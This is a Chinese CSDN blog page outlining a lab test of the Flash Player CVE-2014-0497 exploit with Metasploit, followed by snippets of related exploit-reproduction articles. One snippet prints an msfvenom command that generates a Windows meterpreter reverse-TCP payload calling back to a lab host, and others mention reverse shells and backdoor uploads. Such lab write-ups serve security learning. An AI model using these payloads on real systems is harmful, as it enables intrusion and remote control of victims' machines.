Flash Player 漏洞 cve 2014 0497 测试过程

最新推荐文章于 2024-04-18 19:08:23 发布
最新推荐文章于 2024-04-18 19:08:23 发布
阅读量521 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zzshenwang/article/details/38066151
版权

测试环境

system :  windows 7 Home,flash player 11.8.800.50.

Tool :       metasploit ,vickers.swf  ,adobe_flash_avm2

测试步骤


配置合适的靶机环境

网络环境设置妥当

使用 adobe_flash_avm2 攻击测试 


用到的辅助软件


AS3 sorcerer 分析 vickers.swf    EditPad++分析adobe_flash_avm2.rb

zzshenwang
关注
Flash漏洞CVE-2018-4878 )复现
玄道的网安博客
07-29 1370
简介 攻击者通过构造特殊的Flash链接,当用户用浏览器/邮件/Office访问此Flash链接时,会被“远程代码执行”,并且直接被getshell。 影响版本 FlashPlayer28.0.0.137及以前的所有版本 漏洞复现 使用msfvenom生成shell代码 生成代码,其中lhost为kali的ip地址,lport为自定义的端口号 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.111.129 lport=66.
模糊测试--强制性安全漏洞发掘
热门推荐
软件性能测试专栏
01-20 2万+
文档分享地址链接:http://pan.baidu.com/share/link?shareid=2723797392&uk=2485812037 密码:r43x 前 言 我知道"人类和鱼类能够和平共处" 。 --George W. Bush, 2000年9月29日 简介 模糊测试的概念至少已经流传了20年,但是直到最近才引起广泛的关注。安全漏洞困扰了许多流行的客户端应用程序
flash漏洞所用shellcode的分析
06-03 1040
作 者: 轩辕小聪时 间: 2008-06-02,19:29链 接: http://bbs.pediy.com/showthread.php?t=65907作者主页: http://hi.baidu.com/yicong2007目    的: 纯属学习,请勿用于恶意用途最近几天flash漏洞的网马非常流行,于是我想分析一下shellcode是怎么跑的。但是能力所限,还难以像大牛们一样定位到有漏洞
Adobe Flash Player CVE-2012-0779漏洞技术分析
magictong的专栏
05-30 3732
原文地址:http://blogs.technet.com/b/mmpc/archive/2012/05/24/a-technical-analysis-of-adobe-flash-player-cve-2012-0779-vulnerability.aspx 作者:Jeong Wook Oh & Chun Feng (msft-mmpc) 翻译:magictong 2012年5月
flash漏洞所用shellcode的分析(old)
07-23 1101
 作 者: 轩辕小聪时 间: 2008-06-02,19:29链 接: http://bbs.pediy.com/showthread.php?t=65907作者主页: http://hi.baidu.com/yicong2007目 的: 纯属学习,请勿用于恶意用途最近几天flash漏洞的网马非常流行,于是我想分析一下shellcode是怎么跑的。但是能力所限,还难以像大牛们一样定位到有漏洞的代码
Hacking Team Flash 0Day的过程分析教程
嬴政
07-14 3441
Content 漏洞Flash 0Day 为什么是Flash 0Dday 漏洞触发 受影响系统 攻击:漏洞利用 触发原理 动态调试 提权验证 利用形式 防护:思路及建议 思路 建议 教学:Flash漏洞分析 Flash背景知识 Flash文件格式 Flash常用工具介绍 AS脚本 F
红队系列-网络安全知识锦囊(持续更新)
aming小老弟
11-09 993
AJP13是定向包协议。因为性能原因,使用二进制格式来传输可读性文本。AJP协议:WEB服务器通过TCP连接和SERVLET容器连接。为了减少进程生成socket的花费,WEB服务器和SERVLET容器之间尝试保持持久性的TCP连接,对多个请求/回复循环重用一个连接。一旦连接分配给一个特定的请求,在请求处理循环结束之前不会在分配。换句话说,在连接上,请求不是多元的。这个是连接两端的编码变得容易,虽然这导致在一时刻会有很多连接。
Kali Linux 渗透攻击测试
最新发布
jcs233的博客
04-18 1568
一月末,Adobe发布了Flash Player的APSA15-01安全公告,此公告修复了一个可影响FlashPlayer 16.0.0.287及之前版本的重要UAF漏洞(被确认为CVE-2015-0311)。地址:http://blog.coresecurity.com/2015/03/04/exploiting-cve-2015-0311-a-use-after-free-in-adobe-flash-player/作者:Francisco Falcón。实验环境:填写如下IP地址。
POODLE SSLv3 安全漏洞 (CVE-2014-3566)
Greer的博客
08-18 8065
漏洞概述 SSL3.0是已过时且不安全的协议,目前已被TLS 1.0,TLS 1.1,TLS 1.2替代,因为兼容性原因,大多数的TLS实现依然兼容SSL3.0。为了通用性的考虑,目前多数浏览器版本都支持SSL3.0,TLS协议的握手阶段包含了版本协商步骤,一般来说,客户端和服务器端的最新的协议版本将会被使用。其在与服务器端的握手阶段进行版本协商的时,首先提供其所支持协议的最新版本,若该握手失败,
CVE-2014-6271“破壳”漏洞利用过程
D-river博客
11-12 9140
前言CVE-2014-6271(即“破壳”漏洞)广泛存在与GNU Bash 版本小于等于4.3的*inux的系统之中,只要目标服务器开放着与Bash相交互的应用与服务,就有可能成功触发漏洞,获取目标系统当前Bash运行用户相同权限的shell接口。实验环境攻击机:kali linux 目标机: Ubuntu ip: 10.10.10.129漏洞验证 Bash版本小于等于4.3可能存在漏洞
CVE-2014-6271-bash shellshock-破壳漏洞复现
m0_62008601的博客
08-06 3157
这些变量可以包含代码,在shell被调用后会被立即执行。用docker搭建vulhub漏洞靶场,服务启动后,有两个页面http://192.168.217.134:8080/victim.cgi和http://192.168.217.134:8080/safe.cgi。可以看到错误原因都是permission denied,那就是权限不足的原因了,那我们就修改一下权限,让它能够被访问。既然在victim.cgi可以执行命令,那么应该就可以进行反弹shell了,kali开启端口监听,执行反弹shell命令。.
漏洞复现(CVE-2017-10271)
PDblue的博客
03-27 9698
使用https://github.com/vulhub/vulhub在本地进行漏洞环境搭建,需要使用的工具是https://github.com/hanc00l/weblogic_wls_wsat_rce 环境搭建完成后通过浏览器进行访问 使用工具对漏洞进行验证 向服务器上传后门文件 通过浏览器访问后门文件 仅限于本地漏洞环境验证。...
CVE-2014-6271漏洞复现
王嘟嘟的博客
01-16 3116
0x00 前言 要是平时我肯定不会想打去复现这个漏洞的,但是由于需要学习shellshock漏洞的利用,所以这里可以进行一下复现 0x01 正文 这里直接使用别人弄好的docker,简单又方便 docker pull hmlio/vaas-cve-2014-6271 下载完成之后,开启docker docker run -d -p 80:80 hmlio/vaas-cve-2014-6271 访问...
Metasploit CVE-2015-5122 Flash漏洞利用检测试
weixin_33754065的博客
09-13 325
原文:http://www.freebuf.com/articles/system/75419.html 一次有趣的flash漏洞测试验。1、基础环境介绍。本机win8专业版,VMware workstation 11, kali2.0镜像2、环境初始化。安装kali的虚拟机。这个不做讲解,可以看我的以前的文章,也可以随便网上搜一个。记得安装vmtools。方便上传文件。拖...
metasploit利用linux漏洞,利用Metasploit编写Adobe Flash漏洞模块 (CVE-2012-0779)
weixin_39816027的博客
05-16 208
上个月爆了一个Adobe Flash漏洞,影响Windows, Macintosh和Linux平台下的Adobe Flash Player 11.2.202.233和之前版本,Android 4.x下Adobe Flash Player 11.1.115.7及之前版本,Android 3.x和2.x下的Adobe Flash Player 11.1.111.8及之前版本存在一个对象混淆引起的严重...
修复OpenSSL TLS 漏洞 CVE-2014-0160:升级到OpenSSL 1.0.1g
"修复OpenSSL TLS 心跳扩展协议包远程信息泄露漏洞 (CVE-2014-0160),升级至OpenSSL 1.0.1g,并更新OpenSSH和nginx" 在IT安全领域,漏洞管理是至关重要的,尤其是在涉及到关键服务如HTTPS时。OpenSSL是一个广泛应用...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值